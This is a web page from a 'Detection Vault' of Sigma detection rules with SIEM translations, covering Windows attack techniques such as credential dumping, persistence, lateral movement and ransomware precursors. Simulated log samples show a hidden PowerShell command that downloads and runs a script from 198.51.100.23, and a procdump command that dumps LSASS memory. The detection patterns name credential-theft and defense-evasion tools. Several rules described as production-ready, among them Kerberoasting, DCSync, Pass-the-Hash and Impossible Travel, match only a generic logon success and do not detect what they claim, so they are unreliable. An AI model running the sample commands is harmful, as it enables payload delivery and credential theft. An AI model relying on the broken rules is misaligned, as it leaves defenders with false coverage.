Detection Vault — Free Sigma Detection Rules
Production-ready detection rules for real SOC environments. Sigma, KQL, SPL and Wazuh — mapped to MITRE ATT&CK. Free Sigma; SIEM-native exports (Splunk, Sentinel, Elastic, QRadar, Wazuh) via the SCW Intel Bot.
The SCW Detection Vault is a free, continuously updated library of Sigma detection rules for SOC analysts, threat hunters and detection engineers. Every rule is battle-tested, validated in production, and mapped to MITRE ATT&CK. Rules are auto-generated from breaking CVEs (NVD), Israeli National Cyber Directorate (INCD) advisories, and curated SOC use-cases. Sigma format is free for everyone; if you need a SIEM-native version (Splunk SPL, Microsoft Sentinel KQL, Elastic ES|QL, IBM QRadar AQL, Wazuh) the SCW Intel Bot auto-converts on demand.
RULES Detection Rules
Suspicious PowerShell Download Cradle
SIEM PreviewT1059.001 — Command and Scripting Interpreter: PowerShell
Detects PowerShell download cradles used in malware delivery — Invoke-WebRequest, Net.WebClient, and BitsTransfer patterns.
title: Suspicious PowerShell Download Cradle
id: scw-showcase-exec-001
status: stable
level: high
description: |
Detects PowerShell download cradles used in malware delivery — Invoke-WebRequest, Net.WebClient, and BitsTransfer patterns.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.execution
- attack.t1059.001
- attack.t1105
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'Invoke-WebRequest'
- 'Net.WebClient'
- 'DownloadString'
- 'DownloadFile'
- 'Start-BitsTransfer'
condition: selection
falsepositives:
- Legitimate administrative activityindex=windows sourcetype=sysmon EventCode=1
Image="*\\powershell.exe"
(CommandLine="*Invoke-WebRequest*"
OR CommandLine="*Net.WebClient*"
OR CommandLine="*DownloadString*"
OR CommandLine="*DownloadFile*"
OR CommandLine="*Start-BitsTransfer*")
| table _time host user Image CommandLineDeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any (
"Invoke-WebRequest", "Net.WebClient",
"DownloadString", "DownloadFile",
"Start-BitsTransfer")
| project Timestamp, DeviceName, AccountName,
ProcessCommandLineprocess.executable:*\\powershell.exe AND
process.command_line:(
*Invoke-WebRequest* OR *Net.WebClient* OR
*DownloadString* OR *DownloadFile* OR
*Start-BitsTransfer*)SELECT DATEFORMAT(starttime,'yyyy-MM-dd HH:mm') AS date,
sourceip, "Image", "CommandLine"
FROM events
WHERE "Image" ILIKE '%\powershell.exe'
AND ("CommandLine" ILIKE '%Invoke-WebRequest%'
OR "CommandLine" ILIKE '%Net.WebClient%'
OR "CommandLine" ILIKE '%DownloadString%'
OR "CommandLine" ILIKE '%DownloadFile%'
OR "CommandLine" ILIKE '%Start-BitsTransfer%')<rule id="100200" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image" type="pcre2">
(?i)\\powershell\.exe$</field>
<field name="win.eventdata.commandLine" type="pcre2">
(?i)(Invoke-WebRequest|Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer)</field>
<description>Suspicious PowerShell Download Cradle</description>
<mitre>
<id>T1059.001</id>
<id>T1105</id>
</mitre>
<group>sysmon,process_creation,</group>
</rule>{
"timestamp": "2026-04-17T14:32:08Z",
"EventCode": 1,
"host": "WKS-PC042",
"User": "CORP\\j.smith",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage2.ps1')\""
}This is a simulated detection. In a real SIEM, this log entry would trigger an alert with the rule above.
LSASS Memory Access — Credential Dumping
SIEM PreviewT1003.001 — OS Credential Dumping: LSASS Memory
Detects suspicious access to LSASS process memory — primary technique for credential harvesting on Windows endpoints.
title: LSASS Memory Access — Credential Dumping
id: scw-showcase-cred-001
status: stable
level: critical
description: |
Detects suspicious access to LSASS process memory — primary technique for credential harvesting on Windows endpoints.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'lsass'
- 'procdump'
- 'minidump'
- 'sekurlsa'
- 'comsvcs'
filter:
Image|endswith:
- '\wmiprvse.exe'
- '\taskmgr.exe'
- '\MsMpEng.exe'
condition: selection and not filter
falsepositives:
- Legitimate administrative activityindex=windows sourcetype=sysmon EventCode=10
TargetImage="*\\lsass.exe"
(GrantedAccess="0x1010" OR GrantedAccess="0x1038"
OR GrantedAccess="0x1fffff")
NOT (SourceImage="*\\wmiprvse.exe"
OR SourceImage="*\\taskmgr.exe"
OR SourceImage="*\\MsMpEng.exe")
| table _time host user SourceImage GrantedAccessDeviceEvents
| where ActionType == "OpenProcessApiCall"
| where FileName =~ "lsass.exe"
| where InitiatingProcessFileName !in~
("wmiprvse.exe","taskmgr.exe","MsMpEng.exe")
| project Timestamp, DeviceName,
InitiatingProcessFileName,
InitiatingProcessCommandLinewinlog.event_data.TargetImage:*\\lsass.exe AND
winlog.event_data.GrantedAccess:(
"0x1010" OR "0x1038" OR "0x1fffff")
AND NOT process.executable:(
*\\wmiprvse.exe OR *\\taskmgr.exe
OR *\\MsMpEng.exe)SELECT DATEFORMAT(starttime,'yyyy-MM-dd HH:mm') AS date,
sourceip, "SourceImage", "TargetImage", "GrantedAccess"
FROM events
WHERE "TargetImage" ILIKE '%\lsass.exe'
AND "GrantedAccess" IN ('0x1010','0x1038','0x1fffff')
AND "SourceImage" NOT ILIKE '%\wmiprvse.exe'
AND "SourceImage" NOT ILIKE '%\taskmgr.exe'
AND "SourceImage" NOT ILIKE '%\MsMpEng.exe'<rule id="100201" level="14">
<if_group>sysmon_event10</if_group>
<field name="win.eventdata.targetImage" type="pcre2">
(?i)\\lsass\.exe$</field>
<field name="win.eventdata.grantedAccess" type="pcre2">
(0x1010|0x1038|0x1fffff)</field>
<description>LSASS Memory Access — Credential Dumping</description>
<mitre>
<id>T1003.001</id>
</mitre>
<group>sysmon,credential_access,</group>
</rule>{
"timestamp": "2026-04-17T03:14:55Z",
"EventCode": 10,
"host": "DC-PRIMARY",
"User": "NT AUTHORITY\\SYSTEM",
"SourceImage": "C:\\Users\\admin\\Desktop\\procdump64.exe",
"TargetImage": "C:\\Windows\\System32\\lsass.exe",
"GrantedAccess": "0x1fffff",
"CommandLine": "procdump64.exe -accepteula -ma lsass.exe C:\\Temp\\debug.dmp"
}This is a simulated detection. In a real SIEM, this log entry would trigger an alert with the rule above.
Credential Dumping – SAM Registry Hive Export
T1003.002 — OS Credential Dumping: Security Account Manager
Detects attempts to export the SAM, SYSTEM, or SECURITY registry hives — used to extract local account password hashes.
title: SAM Registry Hive Export
id: scw-vault-cred-001
status: stable
level: high
description: |
Detects attempts to export the SAM, SYSTEM, or SECURITY registry hives — used to extract local account password hashes.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.credential_access
- attack.t1003.002
logsource:
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'reg'
- 'save'
CommandLine|contains:
- 'hklm\sam'
- 'hklm\system'
- 'hklm\security'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Near-zero false positive. No legitimate reason and export SAM/SECURITY hives in production.
AMSI Bypass Detected
T1562.001 — Impair Defenses: Disable or Modify Tools
Detects attempts to bypass the Antimalware Scan Interface (AMSI) — used to run malicious PowerShell and .NET without detection.
title: AMSI Bypass Attempt
id: scw-vault-evasion-001
status: experimental
level: high
description: |
Detects attempts to bypass the Antimalware Scan Interface (AMSI) — used to run malicious PowerShell and .NET without detection.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.defense_evasion
- attack.t1562.001
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'AmsiUtils'
- 'amsiInitFailed'
- 'AmsiScanBuffer'
- 'SetProtection(0'
- 'Bypass.AMSI'
condition: selection
falsepositives:
- Legitimate administrative activityNote: AMSI bypass is almost always an attack precursor. Check what ran after the bypass.
Lateral Movement – SMB Admin Share Access
T1021.002 — Remote Services: SMB/Windows Admin Shares
Detects access to admin shares (C$, ADMIN$) from non-standard hosts — common for file deployment and remote execution.
title: Admin Share Access from Non-Server
id: scw-vault-lateral-001
status: stable
level: medium
description: |
Detects access to admin shares (C$, ADMIN$) from non-standard hosts — common for file deployment and remote execution.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.lateral_movement
- attack.t1021.002
logsource:
category: authentication
detection:
selection:
EventType: 'share_access'
CommandLine|contains:
- '\C$'
- '\ADMIN$'
filter:
src_ip|startswith:
- '127.'
condition: selection and not filter
falsepositives:
- Legitimate administrative activityNote: Baseline admin share access from IT management tools. Any access from workstations is suspicious.
New Service Created via sc.exe
T1543.003 — Create or Modify System Process: Windows Service
Detects service creation using sc.exe — a common persistence mechanism used by attackers and malware.
title: New Service Created via sc.exe
id: scw-vault-persist-001
status: experimental
level: medium
description: |
Detects service creation using sc.exe — a common persistence mechanism used by attackers and malware.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.persistence
- attack.t1543.003
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\sc.exe'
CommandLine|contains: 'create'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Filter out known deployment tools (SCCM, Intune) to reduce false positives.
Persistence – Scheduled Task via schtasks
T1053.005 — Scheduled Task/Job: Scheduled Task
Detects creation of scheduled tasks via command line — common persistence technique across all threat actors.
title: Scheduled Task Creation via schtasks.exe
id: scw-vault-persist-002
status: stable
level: medium
description: |
Detects creation of scheduled tasks via command line — common persistence technique across all threat actors.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.persistence
- attack.t1053.005
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- '/create'
filter:
User|contains:
- 'SYSTEM'
condition: selection and not filter
falsepositives:
- Legitimate administrative activityNote: Filter SYSTEM-created tasks to reduce noise. Focus on tasks created by regular user accounts.
Persistence – Startup Folder Modification
T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys
Detects files dropped in user or common Startup folders — simple but effective persistence.
title: File Dropped in Startup Folder
id: scw-vault-persist-003
status: stable
level: medium
description: |
Detects files dropped in user or common Startup folders — simple but effective persistence mechanism.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.persistence
- attack.t1547.001
logsource:
category: file_event
detection:
selection:
TargetFilename|contains:
- '\Start Menu\Programs\Startup\'
- '\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\'
filter:
Image|endswith:
- '\explorer.exe'
condition: selection and not filter
falsepositives:
- Legitimate administrative activityNote: Users rarely manually add files to Startup. Processes dropping files there are suspicious.
Privilege Escalation – Token Manipulation
T1134.001 — Access Token Manipulation: Token Impersonation
Detects access token impersonation techniques commonly used to escalate from user to SYSTEM.
title: Token Impersonation via Known Tools
id: scw-vault-privesc-001
status: experimental
level: high
description: |
Detects access token impersonation techniques commonly used to escalate from user to SYSTEM.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.privilege_escalation
- attack.t1134.001
logsource:
category: process_creation
detection:
selection:
Image|endswith:
- '\incognito.exe'
- '\JuicyPotato.exe'
- '\PrintSpoofer.exe'
- '\GodPotato.exe'
- '\RoguePotato.exe'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Near-zero false positive rate. Detection of these tools almost always indicates compromise.
Privilege Escalation – UAC Bypass
T1548.002 — Abuse Elevation Control Mechanism: Bypass UAC
Detects known UAC bypass techniques using fodhelper, eventvwr, or other auto-elevate binaries.
title: UAC Bypass via Auto-Elevate Binary
id: scw-vault-privesc-002
status: experimental
level: high
description: |
Detects known UAC bypass techniques using fodhelper, eventvwr, or other auto-elevate binaries.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.privilege_escalation
- attack.t1548.002
logsource:
category: process_creation
detection:
selection_fodhelper:
ParentImage|endswith: '\fodhelper.exe'
selection_eventvwr:
ParentImage|endswith: '\eventvwr.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
selection_computerdefaults:
ParentImage|endswith: '\computerdefaults.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
condition: selection_fodhelper or selection_eventvwr
or selection_computerdefaults
falsepositives:
- Legitimate administrative activityNote: These binaries should not spawn command interpreters. Any child process is suspicious.
Ransomware – Shadow Copy Deletion
T1490 — Inhibit System Recovery
Detects deletion of Volume Shadow Copies — almost always a ransomware precursor to prevent recovery.
title: Shadow Copy Deletion
id: scw-vault-impact-001
status: stable
level: critical
description: |
Detects deletion of Volume Shadow Copies — almost always a ransomware precursor to prevent recovery.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.impact
- attack.t1490
logsource:
category: process_creation
detection:
selection_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_wmic:
CommandLine|contains|all:
- 'wmic'
- 'shadowcopy'
- 'delete'
selection_bcdedit:
CommandLine|contains|all:
- 'bcdedit'
- 'recoveryenabled'
- 'no'
condition: selection_vssadmin or selection_wmic
or selection_bcdedit
falsepositives:
- Legitimate administrative activityNote: Immediate P1 escalation. Shadow copy deletion + file encryption = active ransomware. Isolate host NOW.
C2 – Cobalt Strike Default Pipe Names
T1570 — Lateral Tool Transfer
Detects named pipes commonly used by Cobalt Strike beacons for inter-process communication.
title: Cobalt Strike Named Pipe Detection
id: scw-vault-c2-001
status: stable
level: critical
description: |
Detects named pipes commonly used by Cobalt Strike beacons for inter-process communication.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.command_and_control
- attack.t1570
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- '\MSSE-'
- '\postex_'
- '\postex_ssh_'
- '\status_'
- '\msagent_'
- '\interprocess_'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Default Cobalt Strike pipe names. Sophisticated actors may rename them. Also check for malleable C2 profiles.
Discovery – AD Domain Enumeration via net.exe
T1087.002 — Account Discovery: Domain Account
Detects use of native Windows net commands to enumerate domain users, groups, and shares.
title: AD Enumeration via net.exe
id: scw-vault-discovery-001
status: stable
level: medium
description: |
Detects use of native Windows net commands to enumerate domain users, groups, and shares.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.discovery
- attack.t1087.002
logsource:
category: process_creation
detection:
selection:
Image|endswith:
- '\net.exe'
- '\net1.exe'
CommandLine|contains:
- 'domain admins'
- 'enterprise admins'
- 'domain controllers'
- 'group "Domain'
- 'user /domain'
- 'accounts /domain'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Multiple net commands in sequence is a stronger indicator. Check if the user is IT staff.
Execution – Certutil Download
T1105 — Ingress Tool Transfer
Detects certutil.exe used to download files — a well-known living-off-the-land binary abuse technique.
title: Certutil Download or Decode
id: scw-vault-exec-001
status: stable
level: high
description: |
Detects certutil.exe used to download files or decode payloads — a well-known living-off-the-land binary abuse technique.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.execution
- attack.t1105
logsource:
category: process_creation
detection:
selection_download:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- 'urlcache'
- '-urlcache'
selection_decode:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- '-decode'
- '-decodehex'
condition: selection_download or selection_decode
falsepositives:
- Legitimate administrative activityNote: Certutil should not be used for downloads in production. High confidence when combined with network connection.
Brute Force – Failed Logons Spike
T1110.001 — Brute Force: Password Guessing
Detects more than 10 failed sign-in attempts from a single IP within 5 minutes. Classic brute force indicator.
title: Brute Force – Failed Logons Spike
id: scw-t1110-001-ub4q
status: stable
level: high
description: |
Detects more than 10 failed sign-in attempts from a single IP within 5 minutes. Classic brute force indicator.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.brute_force
- attack.t1110.001
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'failure'
condition: selection | count(src_ip) by src_ip > 10
falsepositives:
- Legitimate administrative activityNote: Tune the threshold based on your environment. Consider excluding known VPN IPs.
Password Spray – Distributed Failed Logons
T1110.003 — Brute Force: Password Spraying
Detects a single IP trying different usernames with few attempts each — classic password spray pattern that avoids per-user lockout.
title: Password Spray – Distributed Failed Logons
id: scw-t1110-003-ub4v
status: stable
level: high
description: |
Detects a single IP trying different usernames with few attempts each — classic password spray pattern that avoids per-user lockout.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.password_spray
- attack.t1110.003
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'failure'
condition: selection | count(User) by src_ip > 5
falsepositives:
- Legitimate administrative activityNote: Key indicator: many users, few attempts per user from same IP. Correlate with successful logins after spray.
Brute Force – SSH Failed Auth Spike
T1110.001 — Brute Force: Password Guessing
Detects excessive SSH failed authentication attempts from a single source — common in automated SSH brute force attacks.
title: Brute Force – SSH Failed Auth Spike
id: scw-t1110-001-ub4v
status: stable
level: high
description: |
Detects excessive SSH failed authentication attempts from a single source — common in automated SSH brute force attacks.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.ssh
- attack.t1110.001
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'failure'
dst_port: '22'
condition: selection | count(src_ip) by src_ip > 15
falsepositives:
- Legitimate administrative activityNote: Threshold of 15 reduces false positives from misconfigured services. Adjust for your environment.
Azure AD Impossible Travel
T1078 — Valid Accounts
Detects sign-ins from geographically distant locations within a short time window — indicates potential credential theft.
title: Azure AD Impossible Travel
id: scw-t1078-ub4v
status: stable
level: high
description: |
Detects sign-ins from geographically distant locations within a short time window — indicates potential credential theft.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.impossible_travel
- attack.t1078
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Requires geo-IP enrichment. Filter known VPN and corporate egress IPs. Best paired with UEBA.
Credential Dumping – LSASS Access
T1003.001 — OS Credential Dumping: LSASS Memory
Detects processes accessing LSASS memory — a primary indicator of credential dumping tools like Mimikatz.
title: Credential Dumping – LSASS Access
id: scw-t1003-001-ub4w
status: stable
level: critical
description: |
Detects processes accessing LSASS memory — a primary indicator of credential dumping tools like Mimikatz.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.lsass
- attack.t1003.001
logsource:
category: process_creation
detection:
selection:
Image|endswith:
- '\procdump.exe'
- '\mimikatz.exe'
- '\dumpert.exe'
CommandLine|contains:
- 'lsass'
condition: selection
falsepositives:
- Legitimate administrative activityNote: High-fidelity rule. Legitimate LSASS access by AV/EDR should be baselined and excluded.
Kerberoasting – Anomalous TGS Requests
T1558.003 — Steal or Forge Kerberos Tickets: Kerberoasting
Detects high-volume TGS ticket requests targeting service accounts — classic Kerberoasting pattern for offline password cracking.
title: Kerberoasting – Anomalous TGS Requests
id: scw-t1558-003-ub4w
status: stable
level: high
description: |
Detects high-volume TGS ticket requests targeting service accounts — classic Kerberoasting pattern for offline password cracking.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.kerberoasting
- attack.t1558.003
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Correlate with Event ID 4769 in Windows Security logs. Focus on encryption type 0x17 (RC4) which is commonly targeted.
DCSync – Replication Rights Abuse
T1003.006 — OS Credential Dumping: DCSync
Detects directory replication requests from non-domain-controller IPs — a strong indicator of DCSync attacks using Mimikatz.
title: DCSync – Replication Rights Abuse
id: scw-t1003-006-ub4w
status: stable
level: critical
description: |
Detects directory replication requests from non-domain-controller IPs — a strong indicator of DCSync attacks using Mimikatz.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.dcsync
- attack.t1003.006
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Whitelist legitimate domain controllers. Any replication request from a workstation is highly suspicious.
MFA Fatigue – Repeated Push Notifications
T1621 — Multi-Factor Authentication Request Generation
Detects repeated MFA push notification attempts — used in MFA fatigue attacks where attackers spam push approvals until the victim accepts.
title: MFA Fatigue – Repeated Push Notifications
id: scw-t1621-ub4w
status: stable
level: high
description: |
Detects repeated MFA push notification attempts — used in MFA fatigue attacks where attackers spam push approvals until the victim accepts.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.mfa_fatigue
- attack.t1621
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'failure'
condition: selection | count(User) by User > 5
falsepositives:
- Legitimate administrative activityNote: Critical for organizations using push-based MFA. Consider implementing number matching to mitigate.
Suspicious PowerShell Execution
T1059.001 — Command and Scripting Interpreter: PowerShell
Detects obfuscated or suspicious PowerShell patterns including encoded commands, bypass flags, and hidden execution.
title: Suspicious PowerShell Execution
id: scw-t1059-001-ub4w
status: stable
level: high
description: |
Detects obfuscated or suspicious PowerShell patterns including encoded commands, bypass flags, and hidden execution.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.powershell
- attack.t1059.001
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- '-EncodedCommand'
- '-enc'
- '-ExecutionPolicy Bypass'
- '-nop'
- 'hidden'
- 'IEX'
- 'Invoke-Expression'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Baseline legitimate admin scripts. Focus on -enc and hidden window combinations.
Defense Evasion – Disable Windows Defender
T1562.001 — Impair Defenses: Disable or Modify Tools
Detects attempts to disable Windows Defender real-time protection or tamper with security settings.
title: Defense Evasion – Disable Windows Defender
id: scw-t1562-001-ub4w
status: stable
level: critical
description: |
Detects attempts to disable Windows Defender real-time protection or tamper with security settings.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.defender
- attack.t1562.001
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'Set-MpPreference -DisableRealtimeMonitoring'
- 'DisableAntiSpyware'
- 'sc stop WinDefend'
- 'sc config WinDefend start= disabled'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Critical alert — disabling endpoint protection is a strong precursor to ransomware deployment.
Security Log Cleared
T1070.001 — Indicator Removal: Clear Windows Event Logs
Detects Windows Security event log being cleared — a common anti-forensics technique to cover attack traces.
title: Security Log Cleared
id: scw-t1070-001-ub4x
status: stable
level: high
description: |
Detects Windows Security event log being cleared — a common anti-forensics technique to cover attack traces.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.log_clearing
- attack.t1070.001
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'wevtutil cl Security'
- 'Clear-EventLog -LogName Security'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Any log clearing outside scheduled maintenance is suspicious. Correlate with other suspicious activity.
Timestomping – File Time Attribute Modification
T1070.006 — Indicator Removal: Timestomp
Detects modification of file timestamps to blend malicious files with legitimate system files — a defense evasion technique.
title: Timestomping – File Time Attribute Modification
id: scw-t1070-006-ub4x
status: stable
level: medium
description: |
Detects modification of file timestamps to blend malicious files with legitimate system files — a defense evasion technique.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.timestomping
- attack.t1070.006
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'timestomp'
- 'Set-ItemProperty'
- 'NtSetInformationFile'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Correlate with newly created files in system directories. Low false-positive rate.
Lateral Movement – PsExec Remote Execution
T1021.002 — Remote Services: SMB/Windows Admin Shares
Detects PsExec usage for remote command execution — commonly used in lateral movement and ransomware deployment.
title: Lateral Movement – PsExec Remote Execution
id: scw-t1021-002-ub4x
status: stable
level: high
description: |
Detects PsExec usage for remote command execution — commonly used in lateral movement and ransomware deployment.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.psexec
- attack.t1021.002
logsource:
category: process_creation
detection:
selection:
Image|endswith:
- '\psexec.exe'
- '\psexesvc.exe'
CommandLine|contains:
- '\\'
condition: selection
falsepositives:
- Legitimate administrative activityNote: PsExec is a dual-use tool. Baseline legitimate admin use and alert on anomalous source hosts.
Lateral Movement – RDP from Unusual Source
T1021.001 — Remote Services: Remote Desktop Protocol
Detects RDP connections from non-standard source IPs — may indicate lateral movement using stolen credentials.
title: Lateral Movement – RDP from Unusual Source
id: scw-t1021-001-ub4x
status: stable
level: medium
description: |
Detects RDP connections from non-standard source IPs — may indicate lateral movement using stolen credentials.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.rdp
- attack.t1021.001
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
dst_port: '3389'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Maintain a whitelist of approved RDP source IPs. Alert on any connections from workstations to workstations.
Lateral Movement – WMI Remote Execution
T1047 — Windows Management Instrumentation
Detects WMI-based remote process execution — a fileless lateral movement technique used by advanced adversaries.
title: Lateral Movement – WMI Remote Execution
id: scw-t1047-ub4x
status: stable
level: high
description: |
Detects WMI-based remote process execution — a fileless lateral movement technique used by advanced adversaries.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.wmi
- attack.t1047
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\wmic.exe'
CommandLine|contains:
- '/node:'
- 'process call create'
condition: selection
falsepositives:
- Legitimate administrative activityNote: WMI remote execution is a strong indicator of hands-on-keyboard adversary activity.
Lateral Movement – Pass-the-Hash
T1550.002 — Use Alternate Authentication Material: Pass the Hash
Detects NTLM authentication patterns consistent with pass-the-hash attacks — using stolen hash values for lateral movement.
title: Lateral Movement – Pass-the-Hash
id: scw-t1550-002-ub4x
status: stable
level: critical
description: |
Detects NTLM authentication patterns consistent with pass-the-hash attacks — using stolen hash values for lateral movement.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.pass_the_hash
- attack.t1550.002
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Look for NTLM type 3 logons with null domain from unexpected source hosts. Restrict NTLM where possible.
Persistence – Registry Run Key Modification
T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys
Detects modification of Windows Registry Run keys — a classic persistence mechanism that ensures malware survives reboot.
title: Persistence – Registry Run Key Modification
id: scw-t1547-001-ub4x
status: stable
level: high
description: |
Detects modification of Windows Registry Run keys — a classic persistence mechanism that ensures malware survives reboot.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.registry
- attack.t1547.001
logsource:
category: registry_set
detection:
selection:
TargetObject|contains:
- '\CurrentVersion\Run\'
- '\CurrentVersion\RunOnce\'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Baseline known good entries. Focus on new entries pointing to temp directories or encoded PowerShell.
Persistence – WMI Event Subscription
T1546.003 — Event Triggered Execution: WMI Event Subscription
Detects WMI event subscription creation — a stealthy persistence technique that survives reboots without visible Registry changes.
title: Persistence – WMI Event Subscription
id: scw-t1546-003-ub4y
status: stable
level: high
description: |
Detects WMI event subscription creation — a stealthy persistence technique that survives reboots without visible Registry changes.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.wmi
- attack.t1546.003
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'EventFilter'
- 'EventConsumer'
- 'FilterToConsumerBinding'
condition: selection
falsepositives:
- Legitimate administrative activityNote: WMI persistence is stealthy and often overlooked. Check for MOF files and WMI repository changes.
Privilege Escalation – Sudo to Root (Linux)
T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Detects privilege escalation via sudo to root — monitors for users gaining root access through sudo commands.
title: Privilege Escalation – Sudo to Root (Linux)
id: scw-t1548-003-ub4y
status: stable
level: medium
description: |
Detects privilege escalation via sudo to root — monitors for users gaining root access through sudo commands.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.sudo
- attack.t1548.003
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'sudo su'
- 'sudo -i'
- 'sudo bash'
- 'sudo /bin/sh'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Baseline expected sudo usage. Alert on first-time sudo by service accounts or during off-hours.
New Local Admin Created
T1136.001 — Create Account: Local Account
Detects creation of new local administrator accounts — a common persistence and privilege escalation technique.
title: New Local Admin Created
id: scw-t1136-001-ub4y
status: stable
level: high
description: |
Detects creation of new local administrator accounts — a common persistence and privilege escalation technique.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.local_admin
- attack.t1136.001
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- 'net localgroup administrators'
- 'Add-LocalGroupMember -Group Administrators'
